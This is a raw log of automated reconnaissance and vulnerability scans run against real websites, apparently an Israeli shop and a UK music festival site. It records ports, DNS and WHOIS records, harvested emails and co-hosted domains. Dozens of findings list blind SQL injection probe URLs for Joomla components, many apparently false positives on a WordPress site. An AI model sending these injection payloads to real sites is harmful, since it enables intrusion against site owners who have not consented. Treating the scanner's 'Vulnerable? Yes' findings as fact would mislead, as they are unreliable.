1353. PluginHeartbleed
1354. PluginSessionRenegotiation
1355. PluginChromeSha1Deprecation
1356. PluginCompression
1357. PluginSessionResumption
1358. PluginCertInfo
1359. PluginOpenSSLCipherSuites
1360.  
1361.  
1362.  
1363. CHECKING HOST(S) AVAILABILITY
1364. -----------------------------
1365.  
1366. ishopy.co.il => WARNING: Could not connect (timeout); discarding corresponding tasks.
1367.  
1368.  
1369.  
1370. SCAN COMPLETED IN 5.04 S
1371. ------------------------
1372. Version: 1.11.10-static
1373. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1374. 
1375. 
1376. ###########################################################
1377. testssl 2.9dev from https://testssl.sh/dev/
1378. 
1379. This program is free software. Distribution and
1380. modification under GPLv2 permitted.
1381. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
1382.  
1383. Please file bugs @ https://testssl.sh/bugs/
1384. 
1385. ###########################################################
1386.  
1387. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
1388. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
1389. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
1390.  
1391.  
1392.  
1393. Unable to open a socket to 81.218.229.174:443. 
1394.  
1395.  
1396. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
1397. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
1398. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
1399. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
1400. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
1401. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
1402. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
1403. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
1404. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
1405. ░ ░ 
1406. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
1407. + -- --=[Scan Complete!
1408.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
1409. + -- --=[Checking if X-Content options are enabled on ishopy.co.il... 
1410.  
1411. + -- --=[Checking if X-Frame options are enabled on ishopy.co.il... 
1412.  
1413. + -- --=[Checking if X-XSS-Protection header is enabled on ishopy.co.il... 
1414.  
1415. + -- --=[Checking HTTP methods on ishopy.co.il... 
1416.  
1417. + -- --=[Checking if TRACE method is enabled on ishopy.co.il... 
1418.  
1419. + -- --=[Checking for META tags on ishopy.co.il... 
1420.  
1421. + -- --=[Checking for open proxy on ishopy.co.il... 
1422.  
1423. + -- --=[Enumerating software on ishopy.co.il... 
1424.  
1425. + -- --=[Checking if Strict-Transport-Security is enabled on ishopy.co.il... 
1426.  
1427. + -- --=[Checking for Flash cross-domain policy on ishopy.co.il... 
1428.  
1429. + -- --=[Checking for Silverlight cross-domain policy on ishopy.co.il... 
1430.  
1431. + -- --=[Checking for HTML5 cross-origin resource sharing on ishopy.co.il... 
1432.  
1433. + -- --=[Retrieving robots.txt on ishopy.co.il... 
1434.  
1435. + -- --=[Retrieving sitemap.xml on ishopy.co.il... 
1436.  
1437. + -- --=[Checking cookie attributes on ishopy.co.il... 
1438.  
1439. + -- --=[Checking for ASP.NET Detailed Errors on ishopy.co.il... 
1440.  
1441. 
1442.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
1443. - Nikto v2.1.6
1444. ---------------------------------------------------------------------------
1445. + No web server found on ishopy.co.il:443
1446. ---------------------------------------------------------------------------
1447. + 0 host(s) tested
1448.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
1449. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/ishopy.co.il-port443.jpg
1450.  + -- --=[Port 445 closed... skipping.
1451.  + -- --=[Port 512 closed... skipping.
1452.  + -- --=[Port 513 closed... skipping.
1453.  + -- --=[Port 514 closed... skipping.
1454.  + -- --=[Port 623 closed... skipping.
1455.  + -- --=[Port 624 closed... skipping.
1456.  + -- --=[Port 1099 closed... skipping.
1457.  + -- --=[Port 1433 closed... skipping.
1458.  + -- --=[Port 2049 closed... skipping.
1459.  + -- --=[Port 2121 closed... skipping.
1460.  + -- --=[Port 3306 closed... skipping.
1461.  + -- --=[Port 3310 closed... skipping.
1462.  + -- --=[Port 3128 closed... skipping.
1463.  + -- --=[Port 3389 closed... skipping.
1464.  + -- --=[Port 3632 closed... skipping.
1465.  + -- --=[Port 4443 closed... skipping.
1466.  + -- --=[Port 5432 closed... skipping.
1467.  + -- --=[Port 5800 closed... skipping.
1468.  + -- --=[Port 5900 closed... skipping.
1469.  + -- --=[Port 5984 closed... skipping.
1470.  + -- --=[Port 6000 closed... skipping.
1471.  + -- --=[Port 6667 closed... skipping.
1472.  + -- --=[Port 8000 closed... skipping.
1473.  + -- --=[Port 8100 closed... skipping.
1474.  + -- --=[Port 8080 closed... skipping.
1475.  + -- --=[Port 8180 closed... skipping.
1476.  + -- --=[Port 8443 closed... skipping.
1477.  + -- --=[Port 8888 closed... skipping.
1478.  + -- --=[Port 10000 closed... skipping.
1479.  + -- --=[Port 16992 closed... skipping.
1480.  + -- --=[Port 27017 closed... skipping.
1481.  + -- --=[Port 27018 closed... skipping.
1482.  + -- --=[Port 27019 closed... skipping.
1483.  + -- --=[Port 28017 closed... skipping.
1484.  + -- --=[Port 49152 closed... skipping.
1485.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
1486. #########################################################################################
1487. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
1488. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
1489. `888. .8' .88888. Y88bo. 888 8 888 888
1490. `888.8' .8' `888. `ZY8888o. 888 8 888 888
1491. `888' .88ooo8888. `0Y88b 888 8 888 888
1492. 888 .8' `888. oo .d8P `88. .8' `88b d88'
1493. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
1494. Welcome to Yasuo v2.3
1495. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
1496. #########################################################################################
1497.  
1498. I, [2018-01-05T08:00:20.759005 #23233] INFO -- : Initiating port scan
1499. I, [2018-01-05T08:00:24.066500 #23233] INFO -- : Using nmap scan output file logs/nmap_output_2018-01-05_08-00-20.xml
1500.  + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
1501.  + -- ----------------------------=[Running Brute Force]=--------------------- -- +
1502.  __________ __ ____ ___
1503.  \______ \_______ __ ___/ |_ ____ \ \/ /
1504.  | | _/\_ __ \ | \ __\/ __ \ \ / 
1505.  | | \ | | \/ | /| | \ ___/ / \ 
1506.  |______ / |__| |____/ |__| \___ >___/\ \ 
1507.  \/ \/ \_/
1508.  
1509.  + -- --=[BruteX v1.7 by 1N3
1510.  + -- --=[http://crowdshield.com
1511.  
1512.  
1513. ################################### Running Port Scan ##############################
1514.  
1515. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 08:00 EST
1516. Nmap done: 1 IP address (1 host up) scanned in 4.58 seconds
1517.  
1518. ################################### Running Brute Force ############################
1519.  
1520.  + -- --=[Port 21 closed... skipping.
1521.  + -- --=[Port 22 closed... skipping.
1522.  + -- --=[Port 23 closed... skipping.
1523.  + -- --=[Port 25 closed... skipping.
1524.  + -- --=[Port 80 closed... skipping.
1525.  + -- --=[Port 110 closed... skipping.
1526.  + -- --=[Port 139 closed... skipping.
1527.  + -- --=[Port 162 closed... skipping.
1528.  + -- --=[Port 389 closed... skipping.
1529.  + -- --=[Port 443 closed... skipping.
1530.  + -- --=[Port 445 closed... skipping.
1531.  + -- --=[Port 512 closed... skipping.
1532.  + -- --=[Port 513 closed... skipping.
1533.  + -- --=[Port 514 closed... skipping.
1534.  + -- --=[Port 993 closed... skipping.
1535.  + -- --=[Port 1433 closed... skipping.
1536.  + -- --=[Port 1521 closed... skipping.
1537.  + -- --=[Port 3306 closed... skipping.
1538.  + -- --=[Port 3389 closed... skipping.
1539.  + -- --=[Port 5432 closed... skipping.
1540.  + -- --=[Port 5900 closed... skipping.
1541.  + -- --=[Port 5901 closed... skipping.
1542.  + -- --=[Port 8000 closed... skipping.
1543.  + -- --=[Port 8080 closed... skipping.
1544.  + -- --=[Port 8100 closed... skipping.
1545.  + -- --=[Port 6667 closed... skipping.
1546.  
1547. #######################################################################################################################################
1548. Hostname www.novalisfestival.com ISP Unknown
1549. Continent Unknown Flag
1550. GB
1551. Country United Kingdom Country Code GB
1552. Region Unknown Local time 05 Jan 2018 12:47 GMT
1553. City Unknown Latitude 54
1554. IP Address (IPv6) 2a01:9cc0:0:1:1a:3:0:11c Longitude -2 ISP
1555. #######################################################################################################################################
1556. [i] Scanning Site: https://novalisfestival.com
1557.  
1558.  
1559.  
1560. B A S I C I N F O
1561. ====================
1562.  
1563.  
1564. [+] Site Title: NOVALIS MUSIC + art festival &#8211; 07.07. &#8211; 14.07.2018
1565. [+] IP address: 185.119.174.103
1566. [+] Web Server: nginx
1567. [+] CMS: WordPress
1568. [+] Cloudflare: Not Detected
1569. [+] Robots File: Could NOT Find robots.txt!
1570.  
1571.  
1572.  
1573.  
1574. W H O I S L O O K U P
1575. ========================
1576.  
1577. Domain Name: NOVALISFESTIVAL.COM
1578. Registry Domain ID: 1862235451_DOMAIN_COM-VRSN
1579. Registrar WHOIS Server: whois.udag.net
1580. Registrar URL: http://www.united-domains.de
1581. Updated Date: 2017-06-11T07:09:03Z
1582. Creation Date: 2014-06-10T07:50:11Z
1583. Registry Expiry Date: 2018-06-10T07:50:11Z
1584. Registrar: United-Domains AG
1585. Registrar IANA ID: 1408
1586. Registrar Abuse Contact Email: abuse@united-domains.de
1587. Registrar Abuse Contact Phone: +49.8151368670
1588. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
1589. Name Server: NS1.WEBFACTION.COM
1590. Name Server: NS2.WEBFACTION.COM
1591. Name Server: NS3.WEBFACTION.COM
1592. Name Server: NS4.WEBFACTION.COM
1593. DNSSEC: unsigned
1594. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
1595. >>> Last update of whois database: 2018-01-05T12:55:15Z <<<
1596.  
1597. For more information on Whois status codes, please visit https://icann.org/epp
1598.  
1599.  
1600.  
1601. The Registry database contains ONLY .COM, .NET, .EDU domains and
1602. Registrars.
1603.  
1604.  
1605.  
1606.  
1607. G E O I P L O O K U P
1608. =========================
1609.  
1610. [i] IP Address: 185.119.174.103
1611. [i] Country: GB
1612. [i] State: N/A
1613. [i] City: N/A
1614. [i] Latitude: 51.496399
1615. [i] Longitude: -0.122400
1616.  
1617.  
1618.  
1619.  
1620. H T T P H E A D E R S
1621. =======================
1622.  
1623.  
1624. [i] HTTP/1.1 301 Moved Permanently
1625. [i] Server: nginx
1626. [i] Date: Fri, 05 Jan 2018 12:55:31 GMT
1627. [i] Content-Type: text/html; charset=iso-8859-1
1628. [i] Content-Length: 239
1629. [i] Connection: close
1630. [i] Location: http://www.novalisfestival.com/
1631. [i] HTTP/1.1 301 Moved Permanently
1632. [i] Server: nginx
1633. [i] Date: Fri, 05 Jan 2018 12:55:31 GMT
1634. [i] Content-Type: text/html; charset=iso-8859-1
1635. [i] Content-Length: 240
1636. [i] Connection: close
1637. [i] Location: https://www.novalisfestival.com/
1638. [i] HTTP/1.1 200 OK
1639. [i] Server: nginx
1640. [i] Date: Fri, 05 Jan 2018 12:55:32 GMT
1641. [i] Content-Type: text/html; charset=UTF-8
1642. [i] Connection: close
1643. [i] Link: <https://www.novalisfestival.com/index.php?rest_route=/>; rel="https://api.w.org/", <https://www.novalisfestival.com/>; rel=shortlink
1644.  
1645.  
1646.  
1647.  
1648. D N S L O O K U P
1649. ===================
1650.  
1651. novalisfestival.com. 3599 IN A 185.119.174.103
1652. novalisfestival.com. 3599 IN NS ns1.webfaction.com.
1653. novalisfestival.com. 3599 IN NS ns2.webfaction.com.
1654. novalisfestival.com. 3599 IN NS ns3.webfaction.com.
1655. novalisfestival.com. 3599 IN NS ns4.webfaction.com.
1656. novalisfestival.com. 3599 IN SOA ns4.webfaction.com. hostmaster.novalisfestival.com. 1 10800 3600 604800 3600
1657. novalisfestival.com. 3599 IN MX 10 mx7.webfaction.com.
1658. novalisfestival.com. 3599 IN MX 10 mx8.webfaction.com.
1659. novalisfestival.com. 3599 IN MX 10 mx9.webfaction.com.
1660. novalisfestival.com. 3599 IN AAAA 2a01:9cc0:0:1:1a:3:0:11c
1661.  
1662.  
1663.  
1664.  
1665. S U B N E T C A L C U L A T I O N
1666. ====================================
1667.  
1668. Address = 2a01:9cc0:0:1:1a:3:0:11c
1669. Network = 2a01:9cc0:0:1:1a:3:0:11c / 128
1670. Netmask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
1671. Wildcard Mask = ::
1672. Hosts Bits = 0
1673. Max. Hosts = 0 (2^0 - 1)
1674. Host Range = { 2a01:9cc0:0:1:1a:3:0:11d - 2a01:9cc0:0:1:1a:3:0:11c }
1675.  
1676.  
1677.  
1678. N M A P P O R T S C A N
1679. ============================
1680.  
1681.  
1682. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-05 12:55 UTC
1683. Nmap scan report for novalisfestival.com (185.119.174.103)
1684. Host is up (0.076s latency).
1685. Other addresses for novalisfestival.com (not scanned): 2a01:9cc0:0:1:1a:3:0:11c
1686. rDNS record for 185.119.174.103: web564.webfaction.com
1687. PORT STATE SERVICE VERSION
1688. 21/tcp open ftp vsftpd 3.0.2
1689. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
1690. 23/tcp filtered telnet
1691. 25/tcp filtered smtp
1692. 80/tcp open http nginx
1693. 110/tcp filtered pop3
1694. 143/tcp filtered imap
1695. 443/tcp open ssl/http nginx
1696. 445/tcp filtered microsoft-ds
1697. 3389/tcp filtered ms-wbt-server
1698. Service Info: OS: Unix
1699.  
1700. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1701. Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds
1702.  
1703.  
1704.  
1705. S U B - D O M A I N F I N D E R
1706. ==================================
1707.  
1708.  
1709. [i] Total Subdomains Found : 0
1710.  
1711.  
1712.  
1713.  
1714.  
1715. R E V E R S E I P L O O K U P
1716. ==================================
1717.  
1718.  
1719. [i] Total Sites Found On This Server : 0
1720.  
1721. !] IP Address : 185.119.174.103
1722. [!] Server: nginx
1723. [-] Clickjacking protection is not in place.
1724. [!] novalisfestival.com doesn't seem to use a CMS
1725. [+] Honeypot Probabilty: 0%
1726. ----------------------------------------
1727. PORT STATE SERVICE VERSION
1728. 21/tcp open ftp vsftpd 3.0.2
1729. 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
1730. 23/tcp filtered telnet
1731. 25/tcp filtered smtp
1732. 80/tcp open http nginx
1733. 110/tcp filtered pop3
1734. 143/tcp filtered imap
1735. 443/tcp open ssl/http nginx
1736. 445/tcp filtered microsoft-ds
1737. 3389/tcp filtered ms-wbt-server
1738. ----------------------------------------
1739.  
1740. [+] DNS Records
1741. ns1.webfaction.com. (185.20.51.42) AS198047 UK Webhosting Ltd United Kingdom
1742. ns2.webfaction.com. (103.44.220.74) AS133882 PARAGON INTERNET GROUP LIMITED Singapore
1743. ns4.webfaction.com. (148.72.160.4) AS30083 server4you Inc. United States
1744. ns3.webfaction.com. (62.138.130.11) AS20773 Host Europe GmbH Germany
1745.  
1746. [+] MX Records
1747. 10 (185.20.49.163) AS198047 UK Webhosting Ltd United Kingdom
1748.  
1749. [+] MX Records
1750. 10 (185.20.49.164) AS198047 UK Webhosting Ltd United Kingdom
1751.  
1752. [+] MX Records
1753. 10 (185.20.49.162) AS198047 UK Webhosting Ltd United Kingdom
1754.  
1755. [+] Host Records (A)
1756. novalisfestival.comHTTP: (web564.webfaction.com) (185.119.174.103) AS198047 UK Webhosting Ltd United Kingdom
1757.  
1758. [+] TXT Records
1759.  
1760. [+] DNS Map: https://dnsdumpster.com/static/map/novalisfestival.com.png
1761.  
1762. [>] Initiating 3 intel modules
1763. [>] Loading Alpha module (1/3)
1764. [>] Beta module deployed (2/3)
1765. [>] Gamma module initiated (3/3)
1766.  
1767.  
1768. [+] Emails found:
1769. ------------------
1770. info@novalisfestival.com
1771. sales@novalisfestival.com
1772.  
1773. [+] Hosts found in search engines:
1774. ------------------------------------
1775. [-] Resolving hostnames IPs...
1776. 185.119.174.103:www.novalisfestival.com
1777. [+] Virtual hosts:
1778. -----------------
1779. 185.119.174.103 scotsfiddlefestival
1780. 185.119.174.103 www.oak-beams
1781. 185.119.174.103 baaningkao
1782. 185.119.174.103 www.hipsarchitecturalironmongery
1783. 185.119.174.103 www.exiliadosrepublicanos.info
1784. 185.119.174.103 www.zagrebtours
1785. 185.119.174.103 www.montaguejeffery
1786. 185.119.174.103 www.updown.co.il
1787. 185.119.174.103 yumtz.com
1788. 185.119.174.103 www.lewiscommercials
1789. 185.119.174.103 eplaw
1790. 185.119.174.103 www.constructionleadershipcouncil
1791. 185.119.174.103 haywoodparkfarm
1792. 185.119.174.103 www.dua
1793. 185.119.174.103 eplaw.org
1794. 185.119.174.103 www.montaguejeffery.co.uk
1795. 185.119.174.103 www.constructionleadershipcouncil.co.uk
1796. 185.119.174.103 mesta.net
1797. 185.119.174.103 www.ferrocentralsa.com.ar
1798. 185.119.174.103 www.onsk8.com
1799. 185.119.174.103 www.derinbilgi.com.tr
1800. 185.119.174.103 grothia.gr
1801. 185.119.174.103 www.7iklim.com
1802. 185.119.174.103 www.gak.gda.pl
1803. 185.119.174.103 www.vikendi.com
1804. [>] Crawling the target for fuzzable URLs
1805.  
1806. Target: http://novalisfestival.com
1807.  
1808. Server: nginx
1809.  
1810.  
1811. ## Checking if the target has deployed an Anti-Scanner measure
1812.  
1813. [!] Scanning Passed ..... OK
1814.  
1815.  
1816. ## Detecting Joomla! based Firewall ...
1817.  
1818. [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
1819. [!] The vulnerability probing may be logged and protected.
1820.  
1821. [!] A Joomla! J-Firewall (com_jfw) is detected.
1822. [!] The vulnerability probing may be logged and protected.
1823.  
1824. [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
1825. [!] The vulnerability probing may be logged and protected.
1826.  
1827. [!] A SecureLive Joomla! firewall is detected.
1828. [!] The vulnerability probing may be logged and protected.
1829.  
1830. [!] FWScript(from firewallscript.com) is likely to be used.
1831. [!] The vulnerability probing may be logged and protected.
1832.  
1833. [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
1834. [!] It is likely that webmaster routinely checks insecurities.
1835.  
1836. [!] A security scanner (com_securityscanner/com_securityscan) is detected.
1837.  
1838. [!] A Joomla! jSecure Authentication is detected.
1839. [!] You need additional secret key to access /administrator directory
1840. [!] Default is jSecure like /administrator/?jSecure ;)
1841.  
1842. [!] A Joomla! GuardXT Security Component is detected.
1843. [!] It is likely that webmaster routinely checks for insecurities.
1844.  
1845. [!] A Joomla! JoomSuite Defender is detected.
1846. [!] The vulnerability probing may be logged and protected.
1847.  
1848.  
1849. ## Fingerprinting in progress ...
1850.  
1851. ~Unable to detect the version. Is it sure a Joomla?
1852.  
1853. ## Fingerprinting done.
1854.  
1855.  
1856.  
1857.  
1858. Vulnerabilities Discovered
1859. ==========================
1860.  
1861. # 1
1862. Info -> Generic: htaccess.txt has not been renamed.
1863. Versions Affected: Any
1864. Check: /htaccess.txt
1865. Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
1866. Vulnerable? Yes
1867.  
1868.  
1869. # 39
1870. Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
1871. Versions effected: N/A
1872. Check: /components/com_banners/
1873. Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
1874. Vulnerable? Yes
1875.  
1876.  
1877. # 77
1878. Info -> Component: paxxgallery Blind SQL Injection Vulnerability
1879. Versions Affected: 0.2 <=
1880. Check: /components/com_paxxgallery/
1881. Exploit: /index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=1+and+1=1::/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=1+and+1=2
1882. Vulnerable? Yes
1883.  
1884.  
1885. # 86
1886. Info -> Component: MediaSlide Blind SQL Injection Vulnerability
1887. Versions Affected: 0.5.0 <=
1888. Check: /components/com_mediaslide/
1889. Exploit: /index.php?option=com_mediaslide&act=contact&id=1&albumnum=1+and+1=1::/index.php?option=com_mediaslide&act=contact&id=1&albumnum=1+and+1=2
1890. Vulnerable? Yes
1891.  
1892. # 204
1893. Info -> Component: com_webhosting Blind SQL Injection Vulnerability
1894. Version Affected: N/A
1895. Check: /components/com_webhosting/
1896. Exploit: /index.php?option=com_webhosting&catid=1+and+1=1::/index.php?option=com_webhosting&catid=1+and+1=2
1897. Vulnerable? Yes
1898.  
1899. # 207
1900. Info -> Component: com_mycontent Blind SQL Injection Vulnerability
1901. Version Affected: N/A
1902. Check: /components/com_mycontent/
1903. Exploit: /index.php?option=com_mycontent&task=view&id=1+and+1=1::/index.php?option=com_mycontent&task=view&id=1+and+1=2
1904. Vulnerable? Yes
1905.  
1906. # 208
1907. Info -> Component: Joo!BB Blind SQL Injection Vulnerability
1908. Version Affected: 0.5.9 or lower
1909. Check: /components/com_joobb/
1910. Exploit: /index.php?option=com_joobb&view=forum&forum=1+and+1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2
1911. Vulnerable? Yes
1912.  
1913. # 209
1914. Info -> Component: acctexp Blind SQL Injection Vulnerability
1915. Version Affected: <= 0.12
1916. Check: /components/com_acctexp/
1917. Exploit: /index.php?option=com_acctexp&task=subscribe&usage=1+and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2
1918. Vulnerable? Yes
1919.  
1920. # 213
1921. Info -> Component: JooBlog Blind SQL Injection Vulnerability
1922. Version Affected: 0.1.1<=
1923. Check: /components/com_jb2/
1924. Exploit: /index.php?option=com_jb2&view=category&CategoryID=1+and+1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2
1925. Vulnerable? Yes
1926.  
1927. # 218
1928. Info -> Component: n-forms Blind SQL Injection Vulnerability
1929. Version Affected: 1.01 <=
1930. Check: /components/com_n-forms/
1931. Exploit: /index.php?option=com_n-forms&form_id=1+and+1=1::/index.php?option=com_n-forms&form_id=1+and+1=2
1932. Vulnerable? Yes
1933.  
1934. # 219
1935. Info -> Component: yvcomment Blind SQL Injection Vulnerability
1936. Version Affected: 1.16 <=
1937. Check: /components/com_yvcomment/
1938. Exploit: /index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1=1::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1=2
1939. Vulnerable? Yes
1940.  
1941. # 220
1942. Info -> Component: News Portal Blind SQL Injection Vulnerability
1943. Version Affected: 1.0 <=
1944. Check: /components/com_news_portal/
1945. Exploit: /index.php?option=com_news_portal&Itemid=1+and+1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2
1946. Vulnerable? Yes
1947.  
1948. Info -> Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability
1949. Versions Affected: N/A
1950. Check: /components/com_ijoomla_archive/
1951. Exploit: /index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
1952. Vulnerable? Yes
1953.  
1954.  
1955. # 305
1956. Info -> Component: com_digistore (pid) Blind SQL Injection Vulnerability
1957. Versions Affected: N/A
1958. Check: /components/com_digistore/
1959. Exploit: /index.php?option=com_digistore&task=show_product&pid=1+and+1=1::/index.php?option=com_digistore&task=show_product&pid=1+and+1=2
1960. Vulnerable? Yes
1961.  
1962.  
1963. # 345
1964. Info -> Component: com_hbssearch Blind SQL Injection Vulnerability
1965. Versions Affected: N/A
1966. Check: /components/com_hbssearch/
1967. Exploit: /index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
1968. Vulnerable? Yes
1969.  
1970.  
1971. # 348
1972. Info -> Component: com_lowcosthotels (id) Blind SQL Injection Vulnerability
1973. Versions Affect: N/A
1974. Check: /components/com_lowcosthotels/
1975. Exploit: /index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
1976. Vulnerable? Yes
1977.  
1978. # 349
1979. Info -> Component: com_allhotels (id) Blind SQL Injection Vulnerability
1980. Versions Affect: N/A
1981. Check: /components/com_allhotels/
1982. Exploit: /index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
1983. Vulnerable? Yes
1984.  
1985. # 350
1986. Info -> Component: com_ice(catid) Blind SQL Injection Vulnerability
1987. Versions Affected: N/A
1988. Check: /components/com_ice/
1989. Exploit: /index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
1990. Vulnerable? Yes
1991.  
1992. # 351
1993. Info -> Component: com_liveticker(tid) Blind SQL Injection Vulnerability
1994. Versions Affected: N/A
1995. Check: /components/com_liveticker/
1996. Exploit: /index.php?option=com_liveticker&task=viewticker&tid=1 and 1=1::/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=2
1997. Vulnerable? Yes
1998.  
1999.  
2000. # 354
2001. Info -> Component: PAX Gallery (gid) Blind SQL Injection Vulnerability
2002. Versions effected: v 0.1 <=
2003. Check: /components/com_paxgallery/
2004. Exploit: /index.php?option=com_paxgallery&task=table&gid=1%20and%201=1::/index.php?option=com_paxgallery&task=table&gid=1%20and%201=2
2005. Vulnerable? Yes
2006.  
2007. # 355
2008. Info -> Component: com_na_content Blind SQL Injection Vulnerability
2009. Versions effected: v 1.0 <=
2010. Check: /components/com_na_content/
2011. Exploit: /index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
2012. Vulnerable? Yes
2013.  
2014. # 374
2015. Info -> Component: pcchess Blind SQL Injection Vulnerability
2016. Versions effected: N/A
2017. Check: /components/com_pcchess/
2018. Exploit: /index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
2019. Vulnerable? Yes
2020.  
2021. # 375
2022. Info -> Component: PC CookBook Blind SQL Injection Vulnerability
2023. Versions effected: N/A
2024. Check: /components/com_pccookbook/
2025. Exploit: /index.php?option=com_pccookbook&page=viewrecipe&recipe_id=1+and+1=1::/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1+and+1=2
2026. Vulnerable? Yes
2027.  
2028. # 376
2029. Info -> Component: com_waticketsystem Blind SQL Injection Vulnerability
2030. Versions effected: N/A
2031. Check: /components/com_waticketsystem/
2032. Exploit: /index.php?option=com_waticketsystem&act=category&catid=1+and+1=1::/index.php?option=com_waticketsystem&act=category&catid=1+and+1=2
2033. Vulnerable? Yes
2034.  
2035. # 377
2036. Info -> Component: com_eventing Blind SQL Injection Vulnerability
2037. Versions effected: 1.6.x
2038. Check: /components/com_eventing/
2039. Exploit: /index.php?option=com_eventing&catid=1+and+1=1::/index.php?option=com_eventing&catid=1+and+1=2
2040. Vulnerable? Yes
2041.  
2042. # 379
2043. Info -> Component: com_rss DOS Vulnerability
2044. Versions effected: Joomla! <= 1.0.7
2045. Check: /components/com_rss/
2046. Exploit: /index2.php?option=com_rss&feed=test
2047. Vulnerable? Yes
2048.  
2049.  
2050. # 382
2051. Info -> Component: com_gsticketsystem (catid) Blind SQL Injection Vulnerability
2052. Versions effected: N/A
2053. Check: /components/com_gsticketsystem/
2054. Exploit: /index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=1::/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=1+and+1=2
2055. Vulnerable? Yes
2056.  
2057. # 386
2058. Info -> Component: com_agoragroup AgoraGroup Blind SQL Injection Vulnerability
2059. Versions effected: 0.3.5.3 <=
2060. Check: /components/com_agoragroup/
2061. Exploit: /index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=1::/index.php?option=com_agoragroup&con=groupdetail&id=1+and+1=2
2062. Vulnerable? Yes
2063.  
2064. # 388
2065. Info -> Component: Seminar com_seminar Blind SQL Injection Vulnerability
2066. Versions effected: 2.0.4 <=
